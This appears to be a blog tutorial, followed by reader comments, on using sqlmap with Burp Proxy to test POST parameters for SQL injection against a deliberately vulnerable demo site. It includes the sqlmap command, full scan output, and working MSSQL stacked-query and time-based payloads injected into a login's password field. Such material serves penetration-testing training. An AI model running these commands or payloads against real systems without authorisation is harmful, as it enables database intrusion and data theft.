• Subscribe to the low volume list for updates.

sqlmap POST request injection

In the past using sqlmap to perform POST request based SQL injections has always been hit and miss (more often a miss). However I have recently had to revisit this feature and have found it be to much improved. Both in ease of use and accuracy. This is a quick step by step guide to getting it work, we are using Burp Proxy (Free Version) to intercept the post request.

[box type="info"]To perform the POST request sql injections you will need your own installation of sqlmap. Our online sql scanner is only configured to test GET request based injections.[/box]

1. Browse to target site http://testasp.vulnweb.com/Login.asp
2. Configure Burp proxy, point browser Burp (127.0.0.1:8080) with Burp set to intercept in the proxy tab.
3. Click on the submit button on the login form
4. Burp catches the POST request and waits

5. Copy the POST request to a text file, I have called it search-test.txt and placed it in the sqlmap directory
6. Run sqlmap as shown here; the option -r tells sqlmap to read the search-test.txt file to get the information to attack in the POST request. -p is the parameter we are attacking.

./sqlmap.py -r search-test.txt -p tfUPass

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 13:26:52

[13:26:52] [INFO] parsing HTTP request from 'search-test.txt'
[13:26:52] [WARNING] the testable parameter 'tfUPass' you provided is not into the GET
[13:26:52] [WARNING] the testable parameter 'tfUPass' you provided is not into the Cookie
[13:26:52] [INFO] using '/home/testuser/sqlmap/output/testasp.vulnweb.com/session' as session file
[13:26:52] [INFO] resuming injection data from session file
[13:26:52] [WARNING] there is an injection in POST parameter 'tfUName' but you did not provided it this time
[13:26:52] [INFO] testing connection to the target url
[13:26:53] [INFO] testing if the url is stable, wait a few seconds
[13:26:55] [INFO] url is stable
[13:26:55] [WARNING] heuristic test shows that POST parameter 'tfUPass' might not be injectable
[13:26:55] [INFO] testing sql injection on POST parameter 'tfUPass'
[13:26:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:27:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[13:27:05] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[13:27:07] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[13:27:10] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[13:27:12] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[13:27:14] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[13:27:17] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[13:27:30] [INFO] POST parameter 'tfUPass' is 'Microsoft SQL Server/Sybase stacked queries' injectable
[13:27:30] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[13:27:31] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[13:27:31] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[13:27:42] [INFO] POST parameter 'tfUPass' is 'Microsoft SQL Server/Sybase time-based blind' injectable
[13:27:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[13:27:48] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[13:27:48] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
sqlmap got a 302 redirect to /Search.asp - What target address do you want to use from now on? http://testasp.vulnweb.com:80/Login.asp (default) or provide another target address based also on the redirection got from the application

>
[13:27:58] [INFO] target url appears to be UNION injectable with 2 columns
POST parameter 'tfUPass' is vulnerable. Do you want to keep testing the others? [y/N] N
sqlmap identified the following injection points with a total of 68 HTTP(s) requests:
---
Place: POST
Parameter: tfUPass
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: tfUName=test&tfUPass=test'; WAITFOR DELAY '0:0:5';-- AND 'mPfC'='mPfC

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: tfUName=test&tfUPass=test' WAITFOR DELAY '0:0:5'-- AND 'wpkc'='wpkc
---

[13:28:08] [INFO] testing MySQL
[13:28:09] [WARNING] the back-end DBMS is not MySQL
[13:28:09] [INFO] testing Oracle
[13:28:10] [WARNING] the back-end DBMS is not Oracle
[13:28:10] [INFO] testing PostgreSQL
[13:28:10] [WARNING] the back-end DBMS is not PostgreSQL
[13:28:10] [INFO] testing Microsoft SQL Server
[13:28:16] [INFO] confirming Microsoft SQL Server
[13:28:28] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
[13:28:28] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 42 times
[13:28:28] [INFO] Fetched data logged to text files under '/home/testuser/sqlmap/output/testasp.vulnweb.com'

[*] shutting down at: 13:28:28

It is that easy, the sqlmap project continues to push the boundaries when it comes to automated sql injection exploitation and discovery.

9 Comments

  • Chango
    Good stuff man!
  • Zher0
    Helped me out A LOT, thank you!!!
  • hello
    Thanks, helped out! Does the job perfectly, also I think Gason plugin method (to auto send to sqlmap) will also work.
  • Alex
    This is very good! Thank you man!
  • whatever
    THat is a failed injection. What is your point?
  • the R
    This is not a failed injection, he just did not specifie his action to attack the site
  • Apollo Clark
    Please post the full "post.txt" file, the screenshot does not show the entire format required. Great tutorial!
  • ass
    this sucks, like this lamer web ass site
  • aaa
    Thx,learned